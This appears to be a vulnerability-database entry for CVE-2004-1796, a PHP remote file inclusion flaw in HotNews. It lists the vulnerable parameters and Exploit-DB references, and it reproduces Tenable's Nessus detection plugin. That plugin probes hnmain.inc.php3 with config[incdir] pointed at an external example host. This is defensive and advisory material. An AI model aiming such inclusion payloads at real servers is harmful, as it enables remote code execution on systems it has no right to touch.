Vulnerabilities > CVE-2004-1796 - Unspecified vulnerability in Hotnews

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
hotnews
nessus
exploit available

Summary

PHP remote file inclusion vulnerability in HotNews 0.7.2 and earlier allows remote attackers to execute arbitrary PHP code via the (1) config[header] parameter to hotnews-engine.inc.php3 or (2) config[incdir] parameter to hnmain.inc.php3.

Exploit-Db

  • descriptionHotNews 0.x hotnews-engine.inc.php3 config[header] Parameter Remote File Inclusion. CVE-2004-1796. Webapps exploit for php platform
    idEDB-ID:23517
    last seen2016-02-02
    modified2004-01-05
    published2004-01-05
    reporterOfficerrr
    sourcehttps://www.exploit-db.com/download/23517/
    titleHotNews 0.x - hotnews-engine.inc.php3 configheader Parameter Remote File Inclusion
  • descriptionHotNews 0.x config[incdir] Parameter Remote File Inclusion. CVE-2004-1796. Webapps exploit for php platform
    idEDB-ID:23518
    last seen2016-02-02
    modified2004-01-05
    published2004-01-05
    reporterOfficerrr
    sourcehttps://www.exploit-db.com/download/23518/
    titleHotNews 0.x - configincdir Parameter Remote File Inclusion
  • descriptionHotNews 0.7.2 Remote File Inclusion. CVE-2004-1796. Webapps exploit for php platform
    idEDB-ID:12160
    last seen2016-02-01
    modified2010-04-11
    published2010-04-11
    reporterteam_elite
    sourcehttps://www.exploit-db.com/download/12160/
    titleHotNews 0.7.2 - Remote File Inclusion

Nessus

NASL familyCGI abuses
NASL idHOTNEWS_CODE_INJECTION.NASL
descriptionThe remote host is running HotNews, a set of PHP scripts designed to set up a newssystem for web pages. It is possible this suite to make the remote host include php files hosted on a third-party server. An attacker may use this flaw to inject arbitrary code in the remote host and gain a shell with the privileges of the web server.
last seen2020-06-01
modified2020-06-02
plugin id11979
published2004-01-05
reporterThis script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/11979
titleHotNews Multiple Script Remote File Inclusion
code
#
# (C) Tenable Network Security, Inc.
#

# XXXX Untested
#
# Ref:
# From:   [email protected]
# Subject: HotNews arbitary file inclusion
# Date: January 4, 2004 3:45:59 AM CET
# To:   [email protected]


include("compat.inc");

if(description)
{
  script_id(11979);
  script_version ("1.19");
  script_cve_id("CVE-2004-1796");

  script_name(english:"HotNews Multiple Script Remote File Inclusion");
  script_summary(english:"Checks for the presence of HotNews");

  script_set_attribute(attribute:"synopsis", value:
"The remote host has a vulnerability in a PHP application that may
allow for the execution of arbitrary code." );
  script_set_attribute(attribute:"description", value:
"The remote host is running HotNews, a set of PHP scripts designed to set up
a newssystem for web pages.

It is possible this suite to make the remote host include php files hosted
on a third-party server.

An attacker may use this flaw to inject arbitrary code in the remote
host and gain a shell with the privileges of the web server." );
  script_set_attribute(attribute:"solution", value:"Upgrade to the latest version of HotNews" );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2004-1796");

  script_set_attribute(attribute:"plugin_publication_date", value: "2004/01/05");
  script_set_attribute(attribute:"vuln_publication_date", value: "2004/01/03");
  script_cvs_date("Date: 2019/05/31 10:05:08");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"CGI abuses");

  script_dependencie("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if(!can_host_php(port:port))exit(0);


foreach dir (cgi_dirs())
 {
 w = http_send_recv3(item:string(dir, "/includes/hnmain.inc.php3?config[incdir]=http://example.com/"),
 method:"GET", port:port);
 if (isnull(w)) exit(0);
 r = strcat(w[0], w[1], '\r\n', w[2]);
 if("http://example.com/func.inc.php3" >< r)
  {
 	security_hole(port);
	exit(0);
  }
}